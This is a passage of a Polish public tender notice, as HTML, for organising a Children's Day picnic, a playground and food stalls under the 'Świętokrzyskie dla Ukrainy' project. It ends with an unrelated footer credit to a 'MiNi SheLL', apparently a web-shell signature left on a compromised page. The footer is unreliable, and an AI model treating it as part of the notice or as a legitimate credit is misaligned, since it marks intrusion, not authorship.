class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona oceny ofert, które nie zostały odrzucone na<br/>podstawie kryteriów oceny ofert</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 4.1 O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy:<br/>4.1.1 nie podlegają wykluczeniu na podstawie art. 108 ust. 1 oraz art. 109 ust. 1 pkt 4 ustawy oraz art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. z 2022 r. poz. 835 ze zm.).<br/>4.1.2 spełniają warunki udziału w postępowaniu w zakresie zdolności do występowania w obrocie gospodarczym.<br/>Zamawiający nie określa ww. warunku.<br/>4.1.3 spełniają warunki udziału w postępowaniu w zakresie uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów.<br/>Zamawiający nie określa ww. warunku.<br/>4.1.4 spełniają warunki udziału w postępowaniu w zakresie sytuacji ekonomicznej lub finansowej.<br/>Zamawiający nie określa ww. warunku.<br/>4.1.5 spełniają warunki udziału w postępowaniu w zakresie zdolności technicznej lub zawodowej.<br/>a)	w przypadku składania oferty na Część 1:<br/><br/>Zamawiający określa, że ww. warunek zostanie spełniony, jeśli Wykonawca skieruje do realizacji zamówienia:<br/>- co najmniej 10 osób, z których każda posiada ukończony kurs i/lub szkolenie animatora oraz każda przeprowadziła co najmniej 1 animację dla dzieci.<br/>- co najmniej jedną osobę posiadającą kwalifikacje tłumacza języka ukraińskiego.<br/><br/>Funkcje animatora i tłumacza nie mogą być łączone.<br/><br/>b)	w przypadku składania oferty na Część 2:<br/><br/>Zamawiający określa, że ww. warunek zostanie spełniony, jeśli Wykonawca skieruje do realizacji zamówienia:<br/>- co najmniej 3 osoby, z których każda posiada ukończony kurs i/lub szkolenie animatora oraz każda przeprowadziła co najmniej 1 animację dla dzieci. <br/>c) w przypadku składania oferty na Część 3:<br/>Zamawiający nie określa ww. warunku. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający przed<br/>udzieleniem zamówienia, wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie<br/>krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia, następujących podmiotowych środków dowodowych:<br/>1. Odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji.<br/>2. Oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2021 r. poz. 275), z innym Wykonawcą,<br/>który złożył odrębną ofertę, ofertę częściową (o ile dotyczy), albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz<br/>z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej (o ile dotyczy) niezależnie od innego<br/>Wykonawcy należącego do tej samej grupy kapitałowej.<br/>3. Dokumentów dotyczących podmiotu udostępniającego zasoby, wymienionych w pkt 5.2.1 i 5.2.2 SWZ w celu wykazania braku<br/>istnienia wobec nich podstaw wykluczenia – o ile Wykonawca polega na zdolnościach lub sytuacji innego podmiotu.<br/>Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o którym<br/>mowa w pkt 5.2.1 SWZ, składa dokument lub dokumenty wystawione w kraju, w którym Wykonawca ma siedzibę lub miejsce<br/>zamieszkania, potwierdzające, że nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd,<br/>nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju<br/>sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury.<br/>Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w zdaniu<br/>pierwszym, zastępuje się je odpowiednio w całości lub w części dokumentem zawierającym odpowiednio oświadczenie wykonawcy,<br/>ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć,<br/>złożone pod przysięgą, lub, jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o<br/>oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem samorządu<br/>zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy.<br/>Dokumenty i oświadczenia o których mowa w niniejszym punkcie powinny być wystawione nie wcześniej niż 3 miesiące przed ich<br/>złożeniem.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W przypadku składania oferty na Część 1 i/ lub 2 -Wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie<br/>usług wraz z informacjami na temat kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania<br/>zamówienia publicznego, a także wykonywanych przez nie czynności oraz informację o podstawie dysponowania tymi osobami.<br/>Wykaz należy sporządzić według wzoru stanowiącego Załącznik nr 6 i/lub 6a do SWZ.<br/>UWAGA: Wykazy należy złożyć wraz z ofertą. Złożenie wykazów, o którymch mowa w pkt 5.1.6 SWZ wynika z art. 126 ust. 2 ustawy.<br/>Wykazy są niezbędne do zapewnienia prawidłowego przebiegu postępowania, z uwagi na zastosowane przez Zamawiającego, jako kryterium oceny ofert doświadczenia osób, które zostaną skierowane do realizacji zamówienia spełniających warunek udziału w postępowaniu, którego weryfikacja wymaga oceny obu dokumentów .</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i<br/>zawarcia umowy w sprawie zamówienia<br/>publicznego.<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>1) brak podstaw wykluczenia wskazanych w pkt 4.1.1 SWZ oraz warunek określony w pkt 4.1.2 SWZ musi wykazać/spełniać każdy Wykonawca z osobna,<br/>2) warunek określony w pkt 4.1.3 SWZ musi spełniać co najmniej jeden Wykonawca – ten, który zrealizuje zamówienie (jego<br/>część) do realizacji którego te zdolności są wymagane,<br/>3) warunki określone w pkt od 4.1.4 do 4.1.5 SWZ musi spełniać co najmniej jeden Wykonawca lub wszyscy Wykonawcy<br/>łącznie.<br/>W przypadku wnoszenia oferty przez Wykonawców występujących wspólnie, Wykonawcy muszą złożyć: pełnomocnictwo do<br/>reprezentowania Wykonawców występujących wspólnie lub inny dokument potwierdzający umocowanie do reprezentowania<br/>Wykonawców występujących<br/>wspólnie oraz podmiotowe środki dowodowe, oświadczenia i dokumenty, o których mowa w niniejszym Rozdziale, z tym, że<br/>wymienione w pkt 5.1.1, 5.2.1, 5.2.2 i 5.3 SWZ należy złożyć odrębnie dla każdego Wykonawcy <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 16.3	Zamawiający przewiduje możliwość wprowadzenia zmiany do zawartej umowy, na podstawie art. 455 ustawy, w sposób i na warunkach szczegółowo opisanych w załączniku nr 2 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-04-14 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi dokumentami należy złożyć przez Platformę pod adresem: https://platformazakupowa.pl/pn/powiat_wloszczowa</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-04-14 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-05-13</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Z uwagi na ograniczoną liczbę znaków w formularzu służącym do przesyłania ogłoszeń drogą elektroniczną w Sekcji II pkt. 2.3 nie podano pełnej nazwy przedmiotu zamówienia. Pełna nazwa przedmiotu zamówienia:<br/>Część 1 Organizacja i przeprowadzenie pikniku integracyjnego pn. Międzynarodowy Dzień Dziecka <br/>Część 2 Zapewnienie placu zabaw na pikniku integracyjnym pn. Międzynarodowy Dzień Dziecka <br/>Część 3 Zapewnienie punktów małej gastronomii na pikniku integracyjnym pn. Międzynarodowy Dzień Dziecka<br/>w ramach projektu pn. „Świętokrzyskie dla Ukrainy” współfinansowanego ze środków Unii Europejskiej w ramach Regionalnego Programu Operacyjnego Województwa Świętokrzyskiego na lata 2014-2020, Oś Priorytetowa 9. Włączenie społeczne i walka z ubóstwem, Działanie 9.1 Aktywna integracja zwiększająca szanse na zatrudnienie.<br/><br/> <br/>Oferta musi zawierać:<br/>a) Formularz Ofertowy sporządzony i wypełniony według wzoru stanowiącego Załącznik nr 4 do SWZ.<br/>b) pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania wykonawcy – o ile dotyczy;<br/>c) oświadczenia i dokumenty, o których mowa w pkt 5.1 SWZ z zastrzeżeniem, że dokumenty, o których mowa w pkt 5.1.3 – o ile dotyczy;<br/>d) uzasadnienie do zastrzeżenia informacji znajdujących się w ofercie jako tajemnica przedsiębiorstwa – o ile dotyczy.<br/>e) w przypadku składania oferty na częśc 1 i/lub 2 - wykaz „Doświadczenie osób” skierowanych do realizacji zamówienia, zawierający informacje pozwalające na dokonanie oceny zgodnie z kryterium oceny ofert, określonym w pkt 12.4 SWZ. Wykaz należy sporządzić według wzoru, stanowiącego Załącznik Nr 7 i/lub 7a do SWZ. UWAGA - wykaz „Doświadczenie osób” które zostaną skierowane do realizacji zamówienia, nie jest dokumentem, o których mowa w art. 126 ust. 1 ustawy, a tym samym nie podlega przepisom art. 128 ust. 1 ustawy i w razie jego niezłożenia, bądź jeżeli wykaz będzie niekompletny, będzie zawierał błędy, Zamawiający nie będzie wzywał wykonawcy ani do złożenia tego dokumentu, ani do jego uzupełnienia

Creat By MiNi SheLL
Email: jattceo@gmail.com